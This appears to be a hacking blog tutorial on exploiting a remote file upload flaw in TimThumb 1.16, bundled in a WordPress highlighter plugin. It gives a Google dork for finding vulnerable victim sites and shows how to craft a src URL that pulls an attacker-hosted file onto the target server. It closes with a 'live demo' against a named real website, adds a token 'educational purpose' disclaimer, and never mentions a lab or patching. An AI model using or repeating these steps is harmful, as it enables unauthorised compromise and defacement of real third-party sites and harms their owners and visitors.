WordPress TimThumb Plugin - Remote File Upload Vulnerability

Before starting I want you to tell some important things that this vulnerability only works on version 1.16 of TimThumb Plugin.
So now lets begin :-

• First of all find a vulnerable site, by a Google dork inurl:wp-content/plugins/highlighter timthumb.php
• I have already one. After finding a site. Check that it is vulnerable or not, by opening TimThumb.php. For Example :- http://www.example.com/wp-content/plugins/highlighter/libs/timthumb.php. This will tell the version of TimThumb Plugin.
• If the version is 1.16 then well and good, otherwise find another site.This will something look like this.
  
  
• After that, change the url with  http://www.example.com/wp-content/plugins/highlighter/libs/timthumb.php?src=yourfile.
  For Example:-http://www.example.com/wp-content/plugins/highlighter/libs/timthumb.php?src=http://stylo388.my3gb.com/index%20-%20Copy.html.
• Then your uploaded file will be found at http://www.example.com/wp-content/plugins/highlighter/libs/temp/.

[Note:- Your uploaded file will be renamed randomly like efe17a61fc0829a5e3188ddc30820788.html.]

• To find your file goto http://www.example.com/wp-content/plugins/highlighter/libs/temp/, then find your uploaded file by seeing uploads dates.
  
  
• After that, open your uploaded file.
• Ch33R$ !! Now you have successfully done.

Live Demo :- 

• First Step http://www.currentlyobsessed.com/wp-content/plugins/highlighter/libs/timthumb.php?src=http://stylo388.my3gb.com/index%20-%20Copy.html
• Second Step http://www.currentlyobsessed.com/wp-content/plugins/highlighter/libs/temp/efe17a61fc0829a5e3188ddc30820788.html

Note:- This is only for educational purpose. We are not responsible for any harm done by you or any illegal activity.

Feel Free To Leave A Comment If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You!